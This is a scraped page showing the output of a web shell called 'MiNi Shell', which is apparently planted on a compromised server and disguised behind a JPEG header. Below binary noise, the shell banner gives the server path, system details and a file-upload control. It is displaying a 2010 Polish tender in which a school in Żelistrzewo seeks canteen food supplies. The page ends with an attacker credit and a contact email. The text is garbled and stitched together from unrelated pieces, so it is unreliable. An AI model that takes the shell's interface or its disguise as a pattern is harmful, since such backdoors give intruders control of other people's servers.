JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101117/326221-N-2010.html

<p class="kh_header"><b>Puck: Dostawę produktów spożywczych do stołówki Zespołu Szkół w Żelistrzewie.</b><br>
<b>Numer ogłoszenia: 326221 - 2010; data zamieszczenia: 17.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół w Żelistrzewie , ul. Szkolna 1, 84-100 Puck, woj. pomorskie, tel. 0-58 6738618, faks 0-58 6738618.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół Szkół w Żelistrzewie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę produktów spożywczych do stołówki Zespołu Szkół w Żelistrzewie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zestawienie cenowe dostawy owoców i warzyw CPV 15300000-1- część 1

1.	Ziemniaki	7800 kg	
			
2.	Marchew	615 kg	
			
3.	Kalafior	25 szt	
			
4.	Cebula 	150 kg	
			
5.	Buraki	250 kg	
			
6.	Czosnek	30 szt.	
			
7.	Koper 	250 szt.	
			
8.	Pietruszka nać	200 szt.	
			
9.	Szczypior	30 szt.	
			
10.	Por	155 kg	
			
11.	Seler	155 kg.	
			
12.	Pietruszka korzeń - 	60 kg.				
13.	Rzodkiewka 	10 szt.
				
14.	Kapusta wczesna	60 szt.	
			
15.	Papryka:
czerwona - 20 kg 
żółta 	- 15 kg			
16.	Kapusta biała	200 kg
				
17.	Kapusta pekińska 	50 szt				
18.	Kapusta czerwona 	50 kg				
19.	Kapusta kiszona	250 kg	
			
20.	Ogórek kiszony	320 kg	
			
21.	Ogórek świeży - 	160 kg				
22.	Pomidory 	260 kg	
			
23.	Brukiew	40 kg	
			
24.	Jabłka: 
Delicjusz, 300 kg
Lobo- 300 kg
 Champion - 400 kg 
			
25.	Gruszka: Konferencja	160 kg
	
			
26.	Banany 	50 kg				
27.	Wiśnie 	10 kg				
28.	Truskawki 	35 kg.	
			
29.	Pomarańcze	150 kg.	
			
30.	Brzoskwinie	40 kg	
			
31.	Nektarynki	60 kg	
			
32.	Ziemniaki wczesne	1150 kg				

33.	Ogórki małosolne 	50 kg				

34.	Cytryny 	20 kg				

35.	Mandarynki 	80 kg				

36.	Botwinka	30 szt.				
                                                                                                                   
                                                                                                             Zestawienie cenowe: mięso - produkty mięsne  CPV 15110000-2,  CPV 15130000-8 - część 2

l	Schab wieprzowy:
z kością	
    150 kg
				
2.	Łopatka wieprzowa bez kości	430 kg				
3.	Kości wieprzowe świeże	130 kg
				
4.	Mięso mielone:
wieprzowe,  100 kg
wieprzowo- wołowe	210 kg			
5.	Wołowina bez kości zrazowa 	200 kg				
6.	Wołowina bez kości gulaszowa	60 kg				
7.	Wieprzowina gulaszowa	60 kg
				
8.	mięso drobne	100 kg
				
9.	Kości wieprzowe wędzone 	20 kg				
10.	Szynka konserwowa 	15 kg				
11.	Polędwica miodowa	10 kg
				
12.	Polędwica bostońska 	15 kg				
13.	Polędwica Sopocka 	10 kg				
14.	Krakowska Parzona  	5 kg				
15.	Żywiecka 	15 kg				
16.	Parówki cienkie  45 kg
				
17.	Kiełbasa podwawelska 	15 kg				
18.	Kiełbasa piwna 	5 kg				
19.	Kiełbasa zwyczajna 	200 kg				
20.	Kiełbasa golonkowa	10 kg				
21.	Kiełbasa szynkowa	10 kg 				
22.	Kiełbasa tyrolska	10 kg				
23.	Szynka kapitańska 	10 kg				
24.	Bekon ze sznurkiem 	10 kg				
25.	Kiełbasa polska 	10 kg				
26.	Kiełbasa biesiadna 	30 kg				
27.	Szynka tostowa 	10 kg				
28.	Kaszanka 	50 kg				
29.	Kiełbasa francuska 	5 kg				
30.	Kiełbasa wiejska sucha 	5 kg				
31.	Boczek wędzony 	65 kg				
32.	Kabanosy  	5 kg				
33.	Pasztet wielkopol. (131 g) 	150 szt.	                                                                                  











Zestawienie cenowe dostawy pieczywa CPV 15810000-9 - część 3 

1. Chleb zwykły krojony - 0,5 kg	1750 szt.				
2.	Chleb wieloziarnisty krojony	40 szt.				
3.	Chleb razowy krojony ze słonecznikiem	 15 szt			
4.	Bułka tarta 	110 kg				
5.	Bułki kajzerki	3500 szt.				
6.	Drożdżówka:
- z kruszonką - 1000 szt 
- z serem - 500 szt.
- z dżemem - 500 szt.				
7.	Pączki 80 g 	700 szt.				
8.	Ciastka francuskie	500 szt.				
9. 	Ciastka poznańskie 	500 szt.				
10. 	Grzebień z jabłkiem 	500 szt.				
11.	Ciasto karmelowa słodycz	100 kg				
12. 	Sernik 	100 kg				
13. 	 Jabłecznik 	100 kg
				








Zestawienie cenowe pozostałych produktów: oleje CPV 15400000-2, produkty mleczarskie CPV 15500000-3, różne produkty spożywcze CPV-15800000-6, przetworzone owoce i warzywa CPV 15330000-0 - część 4

1.	Cukier kryształ 1 kg 	210 szt.				
2.	Cukier waniliowy 32 g	80 szt.				
3.	Oregano 200 g	5 szt.				
4.	Bazylia 200 g	5 szt.				
5.	Papryka :
Słodka 20 g - 20 szt
Ostra - 20 szt				
6.	Pieprz mielony 20 g	120 szt.				
7.	Majeranek 5 g	30 szt.				
8.	Sól 	100 kg				
9.	Maggi  960 ml	90 szt.			
10.	Kwasek cytrynowy 
10 g	40 szt.				
11.	Przyprawa Kucharek 1 kg 	55 szt				
12.	Przyprawa do ryb  10 g.	5 szt.				
13.	Makaron nitki  	80 kg				
14.	Makaron świderki  	100 kg				
15.	Makaron krajanka  	25 kg				
16.	Mąka 1 kg :
-pszenna - 120 szt
- tortowa - 80 szt.				
17.	Deser korona różne smaki	980 szt.				
18	Fasola Jaś średni 	70 kg.				
19.	Groch łuskany 	50 kg				
20.	Groch cały	50 kg				
21.	Ryż 	80 kg
				
22. 	Margaryna 259 g	150 szt.				
23. 	Płatki czekoladowe 	55 kg				
24.	Jajka  	4300 szt.				
25.	Olej roślinny  	155 l.		
26.	Kukurydza konserwowa 1 kg	12 szt.				
27.	Ananas w syropie 570 g.	15 szt				
28.	Koncentrat pomidorowy  1 l.	105 szt.				
29.	Ogórek konserwowy 1 l. 	60 szt.				
30.	Ketchup 250 g	60 szt.				
31.	Musztarda 250 g	20 szt.
32.	Zaprawa Herbapol     6 l.	60 szt.				
33.,	Majonez 3 kg	18 szt.				
34.	Puding serduszko 	180 szt.				
35.	Mleko UHT 3,2 %   1 l. 	400 szt.				
36.	Masło 200 g.	570 szt.				
37.	Ser: 
Morski, 35 kg
Edamski 15 kg
Salami	20 kg				
38.	Śmietana 30 % -0,5 l.	30 szt.				
39.	Śmietana 12% - 0,5 l.	400 szt.				
40.	Dżem owocowy, różne smaki 1 kg	35 szt.			
41.	Twaróg półtłusty 	200 kg				
42.	Ser topiony krążki Hohland 	100 szt.				
43.	Kawa MK Cafe Premium 250 g	5 szt.			
44.	Kawa Nescafe Classic 200 g.	3 szt.				
45.	Herbata granulowana  1 kg 	12 szt.				
46.	Herbatniki petit bure 100g	390 szt.				
48.	Kakao  Puchatek 0,5 kg 	60 szt				
49.	Ocet 0,5 l. 	10 szt.				
50.	Woda mineralna niegazowana
1,5 l - 60 szt
5 l - 160 szt.
5 l - 15 szt				
51.	Rodzynki 0,5 kg	30 szt.				
49.	Jogurt Danone 120 g 	2000szt				
50.	Wafelki śmietankowe 20 g 	200 szt.				
51.	Wafle jogurtowe 80 g 	700 szt.				
52.	Wafle orzechowe 80 g 	700 szt.				
53.	Koncentrat barszczu 275 ml 	5 szt.				
54.	Wafle Horałki 50 g 	400 szt.				
55.	Jogurt Jogobella 150 g 	3400 szt.				
56.	Wafelki Tago bez polewy 28 g 	200 szt.			
57.	Krem czekoladowy 250 g  	130 szt.				
58.	Serek kanapkowy 150 g 	140 szt.				
59.	Ser kremowy 125 g 	80 szt.				
60.	Makaron spagetti 	130 kg				
61.	Draże śmietankowe 	300 szt.
				
62.	Rogalik czekoladowy 50 g	200 szt.
				
63.	Sok wieloowocowy 200 ml	140 szt.
				
64.	Serek homogenizowany waniliowy 	60 szt.				
65. 	Miód 250 ml 	15 szt.				
66.	Makaron muszelki 	60 kg				
67.	Leczo pieczarkowe 1 l 	30 szt.				
68.	Makrela wędzona 	20 kg				
69.	Filet ze śledzia marynowany 	100kg	
70.	Przyprawa gyros 20 g	12 szt.				
71.	Przyprawa tzatziki 20 g 	12 szt. 				
72.	Groszek z marcheką konserwa 1 l.	30 szt.			
73.	Napój niegazowany w kartonie 1 l. 	100 szt. 			
74.	Napój niegazowany w kartonie 2 l. 	25 szt.			
75. 	Jajko kinder surprise	400 szt.				
76. 	Zając czekoladowy 30 g	 400 szt.				
77.	Baton snickers	400 szt.				
78. 	Czekoladka 15 g	400 szt.				
79.	Zestaw świąteczny z czekoladą 	400 szt.			
80.	Baton maruga 38 g	400 szt.				
81.	Baton Goplana 48 g	400 szt.				
82. 	Galaretka w czekoladzie 180 g	400 szt.			
83.	Czekolada świąteczna 100 g	 1200 szt.			
84.	Bombonierka świąteczna 250 g	400 szt.				
                                                                                                                                                                                                                                                          























Zestawienie cenowe dostawy mrożonek: warzyw i owoców CPV 15331170-9,
 ryb CPV 05110000-9 - część 5

 
1.	Marchew z groszkiem- luzem lub opakowania 2,5 kg 	360 kg	
2.	Mieszanka warzywna 8 skł.- luzem lub opakowania 2,5 kg	140 kg	
3.	Fasolka szparagowa - luzem lub opakowania 2,5 kg 	230 kg	
4.	Bukiet warzyw (królewska) -  luzem lub opakowania 2,5 kg 300 kg	
5.	Truskawka - luzem lub opakowania 2,5 kg	125 kg	
6.	Kalafior - luzem lub opakowania 2,5 kg 	100 kg		
7.	Pieczarki	80 kg				
8.	Kopytka	100 kg				
9.	Dorsz atlantycki filet 	150kg				
10.	Flądra filet 	120 kg	 
11.	Panga 	30 kg				
12.	Mintaj filet	50 kg				
13.	Paluszki rybne	60 kg				
                                                                                                                                                                                                                                                          
Zestawienie cenowe: drób -  CPV 15112100-7  część 6

1.	Pierś z kurczaka	600 kg   
				
2.	Podudzie z kurczaka 	300 kg				
3.	Udka z kurczaka	100 kg				
4.	Piersi z indyka	60 kg				
5.	Porcje rosołowe z kurczaka 	100 kg				
6.	Porcje rosołowe z gęsi 	20 kg				





Artykuły musza być dostarczone do zamawiającego w ciągu 24 godzin po złożeniu zamówienia telefonicznego lub faksem.
Ilości określone w zestawieniach są ilościami szacunkowymi mogą ulec zmniejszeniu lub zwiększeniu w zależności od zapotrzebowania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Dokona oceny na podstawie złożonych oświadczeń na zasadzie spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Dokona oceny na podstawie złożonych oświadczeń na zasadzie spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Dokona oceny na podstawie złożonych oświadczeń na zasadzie spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Dokona oceny na podstawie złożonych oświadczeń na zasadzie spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Dokona oceny na podstawie złożonych oświadczeń na zasadzie spełnia/niespełna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmianę cen jednostkowych poszczególnych artykułów, jeżeli wzrost cen w ciągu roku przekroczy prognozowany (wg kwartalnego wskaźnika cen towarów i usług konsumpcyjnych, ogłoszonego przez GUS), wskaźnik zmiany cen doprecyzowany w ofercie Wykonawcy (w publikatorze ogólnodostępnym), lecz nie częściej niż raz na kwartał.
2. Wykonawca zawiadomi Zamawiającego o planowanej podwyżce cen na piśmie na 14 dni przed jej wprowadzeniem.
3. Zmiany cen na warzywa i owoce odbywać się będzie w oparciu o sezonową zmianę cen: wiosna, lato, jesień, zima. Przy wzroście cen powyżej 10% w stosunku do cen hurtowych według aktualnego cennika z giełdy Pomorskie Centrum Hurtowe RENK z uwzględnieniem wskaźnika wskazanego w formularzu ofertowym.
4. Jeżeli dostawy objęte obecnie obowiązującą stawką VAT zostaną objęte inną stawką podatku VAT, wynagrodzenie brutto za przedmiot zamówienia zostanie zmienione stosownie do obowiązującego prawa. Wynagrodzenie netto nie ulegnie zmianom.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zszelistrzewo.prv.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół w Żelistrzewie 
Żelistrzewo ul. Szkolna 1 84-100 Puck.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2010 godzina 10:00, miejsce: Zespół Szkół w Żelistrzewie 
Żelistrzewo ul. Szkolna 1 84-100 Puck.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com